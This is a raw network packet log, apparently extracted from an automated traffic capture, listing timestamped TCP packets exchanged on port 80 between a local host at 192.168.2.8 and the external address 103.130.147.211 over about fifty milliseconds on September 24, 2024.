                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900554895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900561094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900573015 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900579929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900597095 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900597095 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900696039 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900722027 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900727987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900739908 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900746107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900752068 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900765896 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900773048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900799036 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900799036 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900824070 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900950909 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900957108 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900963068 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900969028 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900979042 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900986910 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.900999069 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901019096 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901046991 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901108980 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901115894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901156902 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901156902 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901174068 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901181936 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901192904 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901200056 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901206017 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901247025 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901247025 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901412964 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901420116 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901432037 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901438951 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901449919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901462078 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901468039 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901547909 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901547909 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901619911 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901637077 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901643991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901676893 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901829004 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901835918 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901849031 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901854992 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901865959 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901916027 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901916027 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901937962 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901945114 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.901957035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902020931 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902046919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902054071 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902065992 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902071953 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902076960 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902084112 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902107000 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902124882 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902151108 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902200937 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902206898 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902219057 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902225018 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902230978 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902283907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902283907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902334929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902352095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902380943 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902388096 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902400970 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902405024 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902420044 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902437925 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902492046 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902601957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902609110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902616024 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902621031 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902626991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902631998 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902646065 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902684927 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902684927 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902728081 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902734995 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902748108 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902791977 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902889967 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902896881 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902909040 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902915001 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902920961 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902932882 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902937889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902942896 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902947903 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902949095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.902957916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903004885 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903004885 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903206110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903214931 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903264999 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903279066 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903285980 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903350115 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903374910 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903398037 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903404951 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903412104 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903418064 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903429031 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.903489113 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.940485954 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.940547943 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.940556049 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.940761089 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.941251040 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.941257954 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.941270113 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.941277027 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.941329002 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.948788881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.948862076 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.948868990 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.948999882 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949012041 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949018002 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949029922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949035883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949043036 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949074030 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949098110 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949238062 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949295998 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949314117 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949350119 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949451923 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949457884 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949467897 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949472904 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949482918 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949487925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949500084 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949503899 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949517012 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949522972 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949570894 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949570894 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949723959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949729919 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949736118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949740887 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949804068 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949875116 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949879885 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949891090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949897051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949903011 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949908972 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.949935913 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950011969 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950016022 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950094938 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950103045 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950109005 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950114965 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950122118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950123072 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950154066 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950192928 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950376987 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950382948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950395107 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950401068 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950407982 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950418949 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950426102 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950443983 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950489998 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950489998 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950520992 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950527906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950540066 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950556040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950562954 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950575113 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950577974 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950582027 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950649977 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950843096 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950849056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950952053 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950979948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950985909 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.950997114 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951003075 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951008081 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951015949 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951020956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951026917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951030970 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951044083 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951050997 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951056004 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951056004 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951059103 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951095104 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951122046 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951128960 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951133966 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951145887 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951153040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951195955 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951260090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951267004 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951277971 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951283932 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951288939 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951297045 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951308966 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951316118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951317072 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951317072 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951323032 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951358080 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951847076 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951853991 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951864958 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951870918 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951875925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951881886 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951894999 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951909065 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951920033 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951920033 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951925039 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951931953 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951937914 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951944113 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951956034 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951956034 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951957941 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951972008 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951983929 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951993942 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.951997995 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952006102 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952011108 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952013016 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952013016 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952018023 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952023983 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952028990 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952038050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952044010 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952049017 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952060938 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952066898 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.952073097 CEST4973480192.168.2.8103.130.147.211
